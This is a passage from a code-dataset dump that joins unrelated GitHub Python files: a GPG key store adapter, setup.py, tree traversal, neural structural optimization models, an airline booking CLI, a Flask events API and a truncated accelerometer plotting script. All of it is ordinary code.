stores.\"\"\"\n\nimport re\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, List\n\nfrom gnupg import GPG\nfrom pydantic import BaseModel\n\nfrom .exceptions import DecryptionError, EncryptionError, NotFoundError, TooManyError\n\nif TYPE_CHECKING:\n from .model.key import GPGKey\n\n\nclass Key(BaseModel):\n \"\"\"Model the relevant data of a GPG key.\"\"\"\n\n id_: str\n name: str\n email: str\n short_key: str\n\n def match(self, identifier: str) -> bool:\n \"\"\"Check if the identifier matches the current key.\n\n It will check the string against the different key properties.\n \"\"\"\n return any(\n getattr(self, attribute) == identifier\n for attribute in [\"id_\", \"name\", \"email\", \"short_key\"]\n )\n\n\nclass KeyStore:\n \"\"\"Define the adapter of the `gpg` key store.\"\"\"\n\n def __init__(self, key_dir: Path, gpg_binary: str = \"/usr/bin/gpg2\") -> None:\n \"\"\"Set the gpg connector.\n\n Args:\n key_dir: Path to the GnuPG home directory where your GPG keys live.\n\n Raises:\n NotFoundError: If the directory doesn't exist\n \"\"\"\n key_dir = key_dir.expanduser()\n if not key_dir.is_dir():\n raise NotFoundError(f\"{key_dir} is not a directory that holds gnupg data.\")\n self.key_dir = key_dir\n self.gpg = GPG(gnupghome=key_dir, gpgbinary=gpg_binary)\n\n def __repr__(self) -> str:\n \"\"\"Return a string that represents the object.\"\"\"\n return f\"KeyStore(key_dir={self.key_dir})\"\n\n def decrypt(self, path: Path) -> str:\n \"\"\"Decrypt the contents of a file.\n\n Args:\n path: Path to the file to decrypt.\n\n Raises:\n NotFoundError: if file doesn't exist\n DecryptError: can't decrypt file\n \"\"\"\n try:\n result = self.gpg.decrypt_file(str(path))\n except ValueError as error:\n raise NotFoundError(\n f\"Could not find the file to decrypt in {path}\"\n ) from error\n\n if result.returncode != 0:\n # E1101: Instance of 'Crypt' has no 'stderr' member. But it does\n raise DecryptionError(result.stderr) # noqa: E1101\n\n return str(result)\n\n def can_decrypt(self, path: Path) -> bool:\n \"\"\"Test if the user can decrypt a file.\n\n Args:\n path: Path to the file to decrypt.\n \"\"\"\n try:\n self.decrypt(path)\n except (NotFoundError, DecryptionError):\n return False\n return True\n\n def encrypt(self, path: Path, keys: List[\"GPGKey\"]) -> None:\n \"\"\"Encrypt a file for a list of keys.\n\n Args:\n path: Path to the file to encrypt.\n keys: GPG keys used to encrypt the file.\n\n Raise:\n EncryptionError: if there is any problem when encrypting the file.\n \"\"\"\n encrypted_data = self.gpg.encrypt_file(str(path), keys)\n if encrypted_data.ok:\n path.write_bytes(encrypted_data.data)\n else:\n # E1101 Instance of 'Crypt' has no 'stderr' member (no-member). But it does\n raise EncryptionError(encrypted_data.stderr) # noqa: E1101\n\n def reencrypt(self, path: Path, keys: List[\"GPGKey\"]) -> None:\n \"\"\"Reencrypt a file for a list of keys.\n\n Args:\n path: Path to the file to reencrypt.\n keys: GPG keys used to encrypt the file.\n\n Raise:\n EncryptionError: if there is any problem when encrypting the file.\n \"\"\"\n data = self.decrypt(path)\n encrypted_data = self.gpg.encrypt(data, keys)\n if encrypted_data.ok:\n path.write_bytes(encrypted_data.data)\n else:\n # E1101 Instance of 'Crypt' has no 'stderr' member (no-member). But it does\n raise EncryptionError(encrypted_data.stderr) # noqa: E1101\n\n def list_recipients(self, path: Path) -> List[\"GPGKey\"]:\n \"\"\"List the keys that can decrypt a file.\n\n Args:\n path: Path to the file to check.\n \"\"\"\n keys = []\n for short_key in self.gpg.get_recipients_file(str(path)):\n try:\n keys.append(self.gpg.list_keys(keys=[short_key])[0][\"fingerprint\"])\n except IndexError as error:\n raise NotFoundError(\n f\"Could not find gpg key with id {short_key}\"\n ) from error\n\n return keys\n\n @property\n def private_key_fingerprints(self) -> List[str]:\n \"\"\"Return the IDs of the private keys.\"\"\"\n return [key[\"fingerprint\"] for key in self.gpg.list_keys(True)]\n\n @property\n def public_key_fingerprints(self) -> List[Key]:\n \"\"\"Return the IDs of the public keys.\n\n It will only use the first id that it finds.\n \"\"\"\n keys = []\n for key in self.gpg.list_keys():\n match = re.match(r\"(?P.*) <(?P.*)>\", key[\"uids\"][0])\n if match is None:\n raise ValueError(\n \"Could not extract the name or email from the gpg key information\"\n )\n keys.append(\n Key(\n id_=key[\"fingerprint\"],\n name=match[\"name\"],\n email=match[\"email\"],\n short_key=key[\"keyid\"],\n )\n )\n\n return keys\n\n def find_key(self, identifier: str) -> Key:\n \"\"\"Return the key that matches the identifier.\n\n Args:\n identifier: GPG key name, email or fingerprint\n\n Raises:\n NotFoundError: If the identifier doesn't match any available public keys.\n TooManyError: If more than one available public key match the identifier.\n \"\"\"\n keys = []\n for key in self.public_key_fingerprints:\n if key.match(identifier):\n keys.append(key)\n\n if len(keys) == 1:\n return keys[0]\n if len(keys) == 0:\n raise NotFoundError(f\"No key found for {identifier}\")\n raise TooManyError(f\"More than one key matched the identifier {identifier}\")\n","repo_name":"lyz-code/pass-collaborate","sub_path":"src/pass_collaborate/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37916273917","text":"#!/usr/bin/env python\n\n\"\"\"\nsuanpan\n\"\"\"\nimport os\n\nfrom setuptools import find_packages, setup\n\n\ndef read_file(path):\n with open(path, \"r\") as f:\n return f.read()\n\n\nREADME = \"README.md\"\npackages = find_packages()\n\nsetup(\n name=\"lostc\",\n version=\"0.1.0\",\n packages=packages,\n license=\"See License\",\n author=\"majik\",\n author_email=\"me@yamajik.com\",\n description=read_file(README),\n long_description=__doc__,\n zip_safe=False,\n include_package_data=True,\n platforms=\"any\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"yamajik/lostc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5632155616","text":"\"\"\"\n13 (노드의 개수)\n1 2 1 3 2 4 3 5 3 6 4 7 5 8 5 9 6 10 6 11 7 12 11 13\n\"\"\"\n\"\"\"\n트리 순회\n:트리 순회는 root 노드를 기준으로 생각하면 쉽습니다.\n\"\"\"\n#1. 전위 순회 (preorder)\ndef preorder(node):\n \"\"\"\n 전위순회를 하는 함수입니다.\n root => 왼쪽 서브트리의 root => 오른쪽 서브트리의 root\n :param node: 노드의 번호입니다. 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n #1. root 방문\n print(node)\n #2. 왼쪽 방문\n preorder(tree[node][0])\n #3. 오른쪽 방문\n preorder(tree[node][1])\n\n#2. 중위 순회 (inorder)\ndef inorder(node):\n \"\"\"\n 중위 순회 함수입니다.\n 왼쪽 서브트리의 root => root => 오른쪽 서브트리의 root\n :param node: 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n inorder(tree[node][0])\n print(node) #현재노드 방문\n inorder(tree[node][1])\n#3. 후위 순회 (postorder)\ndef postorder(node):\n \"\"\"\n 후위 순회 함수입니다.\n 왼쪽 서브트리의 root => 오른쪽 서브트리의 root => root\n :param node: 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n postorder(tree[node][0])\n postorder(tree[node][1])\n print(node)\n\n\n\nV = int(input())\nedges = list(map(int, input().split()))\n\ntree = [[0 for _ in range(3)] for _ in range(V+1)]\n\n\n#2칸씩 건너 뛰면서 입력값 반복\nfor i in range(0, len(edges)-1, 2):\n parent_node = edges[i] #부모 노드 (현재 노드)\n child_node = edges[i+1] #자식 노드\n\n #만약 왼쪽 자식이 비어있으면 넣고\n if tree[parent_node][0] == 0:\n tree[parent_node][0] = child_node\n\n #그렇지 않으면 오른쪽 자식에 삽입\n else:\n tree[parent_node][1] = child_node\n\n #자식 노드의 부모 설정\n tree[child_node][2] = parent_node\n\n#tree 출력\nfor i in range(V+1):\n print(tree[i])\n\nprint('=== 전위 순회===')\nstart_node = 1\npreorder(start_node)\nprint('=== 전위 순회 끝===')\n\nprint('=== 중위 순회 ===')\ninorder(start_node)\nprint('=== 중위 순회 끝 ===')\n\nprint(' === 후위 순회 ===')\npostorder(start_node)\nprint('=== 후위 순회 끝 ===')","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/알고리즘 연습/Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40336160434","text":"import autograd\nimport autograd.core\nimport autograd.numpy as np\nfrom neural_structural_optimization import topo_api\nimport tensorflow as tf\n\n# requires tensorflow 2.0\n\nlayers = tf.keras.layers\n\n\ndef batched_topo_loss(params, envs):\n losses = [env.objective(params[i], volume_contraint=True)\n for i, env in enumerate(envs)]\n return np.stack(losses)\n\n\ndef convert_autograd_to_tensorflow(func):\n @tf.custom_gradient\n def wrapper(x):\n vjp, ans = autograd.core.make_vjp(func, x.numpy())\n return ans, vjp\n return wrapper\n\n\ndef set_random_seed(seed):\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n\n\nclass Model(tf.keras.Model):\n\n def __init__(self, seed=None, args=None):\n super().__init__()\n set_random_seed(seed)\n self.seed = seed\n self.env = topo_api.Environment(args)\n\n def loss(self, logits):\n # for our neural network, we use float32, but we use float64 for the physics\n # to avoid any chance of overflow.\n # add 0.0 to work-around bug in grad of tf.cast on NumPy arrays\n logits = 0.0 + tf.cast(logits, tf.float64)\n f = lambda x: batched_topo_loss(x, [self.env])\n losses = convert_autograd_to_tensorflow(f)(logits)\n return tf.reduce_mean(losses)\n\n\nclass PixelModel(Model):\n\n def __init__(self, seed=None, args=None):\n super().__init__(seed, args)\n shape = (1, self.env.args['nely'], self.env.args['nelx'])\n z_init = np.broadcast_to(args['volfrac'] * args['mask'], shape)\n self.z = tf.Variable(z_init, trainable=True)\n\n def call(self, inputs=None):\n return self.z\n\n\ndef global_normalization(inputs, epsilon=1e-6):\n mean, variance = tf.nn.moments(inputs, axes=list(range(len(inputs.shape))))\n net = inputs\n net -= mean\n net *= tf.math.rsqrt(variance + epsilon)\n return net\n\n\ndef UpSampling2D(factor):\n return layers.UpSampling2D((factor, factor), interpolation='bilinear')\n\n\ndef Conv2D(filters, kernel_size, **kwargs):\n return layers.Conv2D(filters, kernel_size, padding='same', **kwargs)\n\n\nclass AddOffset(layers.Layer):\n\n def __init__(self, scale=1):\n super().__init__()\n self.scale = scale\n\n def build(self, input_shape):\n self.bias = self.add_weight(\n shape=input_shape, initializer='zeros', trainable=True, name='bias')\n\n def call(self, inputs):\n return inputs + self.scale * self.bias\n\n\nclass CNNModel(Model):\n\n def __init__(\n self,\n seed=0,\n args=None,\n latent_size=128,\n dense_channels=32,\n resizes=(1, 2, 2, 2, 1),\n conv_filters=(128, 64, 32, 16, 1),\n offset_scale=10,\n kernel_size=(5, 5),\n latent_scale=1.0,\n dense_init_scale=1.0,\n activation=tf.nn.tanh,\n conv_initializer=tf.initializers.VarianceScaling,\n normalization=global_normalization,\n ):\n super().__init__(seed, args)\n\n if len(resizes) != len(conv_filters):\n raise ValueError('resizes and filters must be same size')\n\n activation = layers.Activation(activation)\n\n total_resize = int(np.prod(resizes))\n h = self.env.args['nely'] // total_resize\n w = self.env.args['nelx'] // total_resize\n\n net = inputs = layers.Input((latent_size,), batch_size=1)\n filters = h * w * dense_channels\n dense_initializer = tf.initializers.orthogonal(\n dense_init_scale * np.sqrt(max(filters / latent_size, 1)))\n net = layers.Dense(filters, kernel_initializer=dense_initializer)(net)\n net = layers.Reshape([h, w, dense_channels])(net)\n\n for resize, filters in zip(resizes, conv_filters):\n net = activation(net)\n net = UpSampling2D(resize)(net)\n net = normalization(net)\n net = Conv2D(\n filters, kernel_size, kernel_initializer=conv_initializer)(net)\n if offset_scale != 0:\n net = AddOffset(offset_scale)(net)\n\n outputs = tf.squeeze(net, axis=[-1])\n\n self.core_model = tf.keras.Model(inputs=inputs, outputs=outputs)\n\n latent_initializer = tf.initializers.RandomNormal(stddev=latent_scale)\n self.z = self.add_weight(\n shape=inputs.shape, initializer=latent_initializer, name='z')\n\n def call(self, inputs=None):\n return self.core_model(self.z)\n","repo_name":"google-research/neural-structural-optimization","sub_path":"neural_structural_optimization/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"21"} +{"seq_id":"3146350740","text":"import os\nfrom typing import Dict\n\ndef get_filename_without_ext(file_name: str) -> str:\n return os.path.splitext(file_name)[0]\n\ndef get_ext(file_name: str) -> str:\n return os.path.splitext(file_name)[1][1:]\n\n\ndef validate_path(directory: str, file_name: str, file_extension: str) -> Dict[str, str]:\n validate = dict()\n if not isinstance(directory, str) or not isinstance(file_name, str):\n validate.update([\n (\"error\", f'Unexpected directory or file name. Both must be string. | directory: {directory}, file: {file_name}'),\n ])\n return validate\n\n if not os.path.exists(directory):\n validate.update([\n (\"error\", f'Directory does not exist. | directory: {directory}')\n ])\n\n if not file_name.endswith(file_extension):\n file_name = f'{file_name}.{file_extension}'\n \n file_path = os.path.join(directory, file_name)\n\n if not os.path.exists(file_path):\n validate.update([\n (\"warn\", f'Path does not exist. | path: {file_path}'),\n ])\n\n validate.update([\n (\"path\", file_path),\n ])\n\n return validate","repo_name":"vshige/blender_model_processing_tool","sub_path":"scripts/utils/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"276319978","text":"def gen(n):\r\n a,b = 1,1\r\n for i in range(n):\r\n yield a\r\n a,b = b,a + b\r\nn=int(input(\"вед колю чисел ф. : \"))\r\ny=list(gen(n))\r\nprint(y)\r\n\r\n\r\n#числа фибоначчи\r\n","repo_name":"Dana123098/-2","sub_path":"Lesson22 generazua funkzu/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9161236643","text":"#!/bin/env python\nimport click\ndef read_size(filesize):\n Size={}\n with open(filesize,'r') as file_size:\n for line in file_size:\n Line=line.strip().split()\n id=Line[0]\n size=Line[1]\n if id not in Size:\n Size[id]=size\n else:\n Size[id]=max(size,Size[id])\n return Size\n\ndef read_huiwen(filehuiwen):\n Huiwen={}\n with open(filehuiwen,'r') as file_huiwen:\n for line in file_huiwen:\n Line=line.strip().split()\n id=Line[0]\n length=int(Line[2])-int(Line[1])+1\n if id not in Huiwen:\n Huiwen[id]=0\n Huiwen[id]=Huiwen[id]+length\n return Huiwen\n\n@click.command()\n@click.option('--filesize')\n@click.option('--filepattern')\n@click.option('--filehuiwen')\n@click.option('--fileout')\n\ndef main(filesize,filepattern,filehuiwen,fileout):\n file_out=open(fileout,'w')\n Size=read_size(filesize)\n Huiwen=read_huiwen(filehuiwen)\n with open(filepattern,'r') as file_pattern:\n for line in file_pattern:\n Line=line.strip().split()\n id=Line[0]\n if id in Size:\n size=Size[id]\n else:\n size=0\n if id in Huiwen:\n huiwen_length=Huiwen[id]\n else:\n huiwen_length=0\n out_line=line.strip()+'\\t'+str(size)+'\\t'+str(huiwen_length)+'\\n'\n file_out.write(out_line)\n\nif __name__=='__main__':\n main()\n\n\n","repo_name":"YinYuan-001/muntjac_code","sub_path":"Fusion_mechanism_analysis/nanopre_reads_analysis/scripts/stat_huiwen.py","file_name":"stat_huiwen.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"24016807","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n\nevents = [\n {\n \"id\": 1,\n \"uid\": 18,\n \"name\": \"Event 1\",\n \"tagline\": \"Tagline for Event 1\",\n \"schedule\": \"2023-05-20T10:00:00Z\",\n \"description\": \"Description for Event 1\",\n \"moderator\": \"John Doe\",\n \"category\": \"Category 1\",\n \"sub_category\": \"Subcategory 1\",\n \"rigor_rank\": 5,\n \"attendees\": []\n }\n\n]\n\n\n# GET /api/v3/app/events?id=:event_id\n@app.route('/api/v3/app/events', methods=['GET'])\ndef get_event_by_id():\n event_id = request.args.get('id')\n event = next((e for e in events if e['id'] == int(event_id)), None)\n\n if event:\n return jsonify(event)\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\n# GET /api/v3/app/events?type=latest&limit=5&page=1\n@app.route('/api/v3/app/events', methods=['GET'])\ndef get_latest_events():\n event_type = request.args.get('type')\n limit = int(request.args.get('limit', 5))\n page = int(request.args.get('page', 1))\n\n\n\n # Paginate results\n start_index = (page - 1) * limit\n end_index = page * limit\n paginated_events = events[start_index:end_index]\n\n return jsonify(paginated_events)\n\n\n# POST /api/v3/app/events\n@app.route('/api/v3/app/events', methods=['POST'])\ndef create_event():\n event_data = request.json\n new_event_id = len(events) + 1\n new_event = {\n \"id\": new_event_id,\n **event_data,\n \"attendees\": []\n }\n\n events.append(new_event)\n return jsonify({\"id\": new_event_id})\n\n\n# PUT /api/v3/app/events/:id\n@app.route('/api/v3/app/events/', methods=['PUT'])\ndef update_event(event_id):\n event_data = request.json\n\n event_index = next((i for i, e in enumerate(events) if e['id'] == event_id), None)\n if event_index is not None:\n events[event_index] = {\"id\": event_id, **event_data}\n return jsonify({\"message\": \"Event updated successfully\"})\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\n# DELETE /api/v3/app/events/:id\n@app.route('/api/v3/app/events/', methods=['DELETE'])\ndef delete_event(event_id):\n event_index = next((i for i, e in enumerate(events) if e['id'] == event_id), None)\n if event_index is not None:\n events.pop(event_index)\n return jsonify({\"message\": \"Event deleted successfully\"})\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"RESHMAWAGHMARE/Flask-Api","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10600803417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 21:40:36 2020\n\n@author: Shivani\n\"\"\"\nimport datetime\nimport Customer, Flight, Booking\n\n\nlistuser=[]\nlistflight=[]\nlistbooking=[]\n \nwhile(True):\n print(\"1. Add a flight\")\n print(\"2. List all flights\")\n print(\"3. List a flight bookings\")\n print(\"4. Add a Customer\")\n print(\"5. Display all the Customer\")\n print(\"6. Book a flight\")\n print(\"7. Cancel a Booking\")\n print(\"8. List flights booked by the user\")\n print(\"9. List all bookings \")\n print(\"10. Exit\")\n option=input(\"Enter your choice : \")\n\n########################################################## \n \n if(option=='1'):\n print(\"\\n Add flight \\n \")\n num=input(\"1. Enter flight number : \")\n f = input(\"2. Enter source : \")\n t = input(\"3. Enter Destination : \")\n date_entry = input('4. Enter a date in YYYY-MM-DD format : ')\n year, month, day = map(int, date_entry.split('-'))\n d = datetime.date(year, month, day)\n q = input(\"5. Enter Quota : \")\n \n obj=Flight.Flight(num, f, t, d, q)\n listflight.append(obj)\n print(\"\\n Added flight! \\n\")\n \n###########################################################\n \n elif(option=='2'):\n print(\"\\n All flight details \\n \")\n for obj in listflight:\n obj.display()\n print(\"\\n\")\n \n###########################################################\n \n elif(option=='3'):\n print(\"\\n All flight booking \\n \")\n fno=input(\"Enter flight number you want to view bookings for : \")\n for obj in listbooking:\n bookinfo=obj.retbook()\n print(bookinfo[3])\n if(bookinfo[3]==fno):\n obj.display()\n \n###########################################################\n \n elif(option=='4'):\n print(\"\\n Add Customer \\n \")\n name= input(\"Enter name : \")\n age = int(input(\"Enter age : \"))\n obj=Customer.Customer(name, age)\n listuser.append(obj) \n print(\"\\nCustomer Added !!\",obj.retcusinfo()[0], \"is the customerID \\n\")\n \n###########################################################\n \n elif(option=='5'):\n print(\"\\n All Customer details \\n \")\n for obj in listuser:\n obj.display()\n print(\"\\n\")\n \n###########################################################\n \n elif(option=='6'):\n \n print(\"\\n Book a flight \\n\")\n id = int(input(\"Enter id : \"))\n flag=True\n for obj in listuser:\n custinfo=obj.retcusinfo()\n print(custinfo[0])\n if(custinfo[0]==id):\n flag=False\n break\n if(flag):\n print(\"Customer doesn't exist, Please add the customer first \\n\")\n else:\n fr = input(\"Enter Source : \")\n to = input(\"Enter Destination : \")\n for obj in listflight:\n flightinfo=obj.retinfo()\n source, destination = [flightinfo[i] for i in (1, 2)]\n if(fr==source and to==destination):\n obj.display()\n fno=input(\"Enter Flight number you want to book : \")\n \n for obj in listflight:\n flightno=obj.retinfo()[0]\n if(fno==flightno):\n break\n \n objbook=Booking.Booking(custinfo, flightinfo)\n listbooking.append(objbook)\n print(\"\\n Booked!! \\n\")\n objbook.display()\n \n###########################################################\n \n elif(option=='7'):\n print(\"\\n Cancel a booking \\n\")\n id=int(input(\"Enter id: \"))\n fno = input(\"Enter flight number you want to cancel : \")\n for obj in listbooking:\n bookinfo=obj.retbook()\n print(bookinfo[0], bookinfo[3])\n if(id==bookinfo[0] and fno==bookinfo[3]):\n listbooking.remove(obj)\n print(\"\\n Cancelled \\n\")\n \n###########################################################\n \n elif(option=='8'):\n print(\"\\n Flights booked by the Customer \\n\")\n id=int(input(\"Enter id: \"))\n for obj in listbooking:\n bookinfo=obj.retbook()\n if(id== bookinfo[0]):\n obj.display()\n \n##########################################################\n \n elif(option=='9'):\n for obj in listbooking:\n \n obj.display()\n \n###########################################################\n \n elif(option=='10'):\n break\n \n###########################################################\n \n else:\n print(\"\\n Invalid input !! \\n\")","repo_name":"human-doodle/Airline-Management-Application","sub_path":"AirlineMgmtApp.py","file_name":"AirlineMgmtApp.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14335190625","text":"import torch\nfrom torch import nn\n\nfrom typing import Optional\n\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, direction_input_dim: int, conditioning_input_dim: int, latent_dim: int, num_heads: int):\n \"\"\"\n Multi-Head Attention module.\n\n Args:\n direction_input_dim (int): The input dimension of the directional input.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n latent_dim (int): The latent dimension of the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n \"\"\"\n super().__init__()\n assert latent_dim % num_heads == 0, \"latent_dim must be divisible by num_heads\"\n self.num_heads = num_heads\n self.head_dim = latent_dim // num_heads\n self.scale = self.head_dim**-0.5\n\n self.query = nn.Linear(direction_input_dim, latent_dim)\n self.key = nn.Linear(conditioning_input_dim, latent_dim)\n self.value = nn.Linear(conditioning_input_dim, latent_dim)\n self.fc_out = nn.Linear(latent_dim, latent_dim)\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Multi-Head Attention module.\n\n Args:\n query (torch.Tensor): The directional input tensor.\n key (torch.Tensor): The conditioning input tensor for the keys.\n value (torch.Tensor): The conditioning input tensor for the values.\n\n Returns:\n torch.Tensor: The output tensor of the Multi-Head Attention module.\n \"\"\"\n batch_size = query.size(0)\n\n Q = self.query(query).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n K = self.key(key).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n V = self.value(value).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n\n attention = torch.einsum(\"bnqk,bnkh->bnqh\", [Q, K.transpose(-2, -1)]) * self.scale\n attention = torch.softmax(attention, dim=-1)\n\n out = torch.einsum(\"bnqh,bnhv->bnqv\", [attention, V])\n out = out.transpose(1, 2).contiguous().view(batch_size, -1, self.num_heads * self.head_dim)\n\n out = self.fc_out(out).squeeze(1)\n return out\n\n\nclass AttentionLayer(nn.Module):\n def __init__(self, direction_input_dim: int, conditioning_input_dim: int, latent_dim: int, num_heads: int):\n \"\"\"\n Attention Layer module.\n\n Args:\n direction_input_dim (int): The input dimension of the directional input.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n latent_dim (int): The latent dimension of the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n \"\"\"\n super().__init__()\n self.mha = MultiHeadAttention(direction_input_dim, conditioning_input_dim, latent_dim, num_heads)\n self.norm1 = nn.LayerNorm(latent_dim)\n self.norm2 = nn.LayerNorm(latent_dim)\n self.fc = nn.Sequential(nn.Linear(latent_dim, latent_dim), nn.ReLU(), nn.Linear(latent_dim, latent_dim))\n\n def forward(self, directional_input: torch.Tensor, conditioning_input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Attention Layer module.\n\n Args:\n directional_input (torch.Tensor): The directional input tensor.\n conditioning_input (torch.Tensor): The conditioning input tensor.\n\n Returns:\n torch.Tensor: The output tensor of the Attention Layer module.\n \"\"\"\n attn_output = self.mha(directional_input, conditioning_input, conditioning_input)\n out1 = self.norm1(attn_output + directional_input)\n fc_output = self.fc(out1)\n out2 = self.norm2(fc_output + out1)\n return out2\n\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n in_dim: int,\n conditioning_input_dim: int,\n hidden_features: int,\n num_heads: int,\n num_layers: int,\n out_activation: Optional[nn.Module],\n ):\n \"\"\"\n Decoder module.\n\n Args:\n in_dim (int): The input dimension of the module.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n hidden_features (int): The number of hidden features in the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n num_layers (int): The number of layers in the module.\n out_activation (nn.Module): The activation function to use on the output tensor.\n \"\"\"\n super().__init__()\n self.residual_projection = nn.Linear(in_dim, hidden_features) # projection for residual connection\n self.layers = nn.ModuleList(\n [\n AttentionLayer(hidden_features, conditioning_input_dim, hidden_features, num_heads)\n for i in range(num_layers)\n ]\n )\n self.fc = nn.Linear(hidden_features, 3) # 3 for RGB\n self.out_activation = out_activation\n\n def forward(self, x: torch.Tensor, conditioning_input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Decoder module.\n\n Args:\n x (torch.Tensor): The input tensor.\n conditioning_input (torch.Tensor): The conditioning input tensor.\n\n Returns:\n torch.Tensor: The output tensor of the Decoder module.\n \"\"\"\n x = self.residual_projection(x)\n for layer in self.layers:\n x = layer(x, conditioning_input)\n x = self.fc(x)\n if self.out_activation is not None:\n x = self.out_activation(x)\n return x\n","repo_name":"JADGardner/ns_reni","sub_path":"reni/field_components/transformer_decoder.py","file_name":"transformer_decoder.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30409307146","text":"from django import forms\nfrom django.forms import ModelForm, DateInput, CheckboxSelectMultiple\nfrom collegeapp.models import Department,Course,Materials,MyModel,Teacher\n\n\n\nclass Order(forms.ModelForm):\n class Meta:\n model=MyModel\n fields=\"__all__\"\n widgets = {\n 'dob': DateInput(attrs={'type': 'date'}),\n 'materials_provided': CheckboxSelectMultiple(),\n }\n\n def __init__(self, data=None, request=None, *args, **kwargs):\n super(Order, self).__init__(data=data, *args, **kwargs)\n self.request = request\n\n if 'department' in self.data:\n try:\n department_id = int(self.data.get('id_department'))\n self.fields['course'].queryset = Course.objects.filter(department_id=department_id).order_by('name')\n except (ValueError, TypeError):\n pass # invalid input from the client; ignore and fallback to empty City queryset\n elif self.instance.pk:\n self.fields['course'].queryset = self.instance.department.course_set.order_by('name')\n","repo_name":"thajessanty/Demopython","sub_path":"collegeproject/collegeapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17053599717","text":"import csv\nimport numpy as np\nimport math as ma\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\nbirth_data = []\nwith open('C:\\\\Users\\\\1\\\\Desktop\\\\dataset\\\\AccelerationExplorer-2020-6-21-11-22-50.csv') as csvfile:\n csv_reader = csv.reader(csvfile) # 使用csv.reader读取csvfile中的文件\n birth_header = next(csv_reader) # 读取第一行每一列的标题\n for row in csv_reader: # 将csv 文件中的数据保存到birth_data中\n birth_data.append(row)\n\nbirth_header.append('v')\nbirth_header.append('pos')\npre = [float(0) for i in row]\n\nfor i in range(len(birth_data)):\n if len(birth_data[i]) < 4 or birth_data[i][1] == '':\n t = birth_data[i][0]\n birth_data[i] = [float(x) for x in pre]\n birth_data[i][0] = float(t)\n else:\n birth_data[i] = [float(x) for x in birth_data[i]]\n pre = birth_data[i]\n\ndef init_colors():\n return ['blue', 'red', 'green', 'black', 'pink', 'purple', 'gray', 'yellow']\n\ndef show_graph(data, save_png_name=None, colors=None):\n \"\"\"\n 绘制折线图\n :param data: 数据格式:{label:{X:Y}, label:{X:Y}...}\n :param save_png_name:保存的图片的名字\n :param colors: 颜色列表\n :return:\n None\n \"\"\"\n # 解决中文显示乱码的问题,不用中文就不需要设置了\n # my_font = font_manager.FontProperties(fname=\"/自己补充路径/IOS8.ttf\")\n\n if colors is None:\n colors = init_colors()\n plt.figure(dpi=512, figsize=(14, 6))\n plts = []\n labels = []\n X = []\n Y = []\n for j in range(1, 6):\n if j == 2 or j == 4 or j == 5:\n for i in range(0, len(data)):\n color = colors[j]\n X.append(i)\n Y.append(data[i][j])\n temp, = plt.plot(X, Y, linewidth=0.5, color=color, label='')\n plts.append(temp)\n X = []\n Y = []\n labels.append(birth_header[1])\n labels.append(birth_header[4])\n 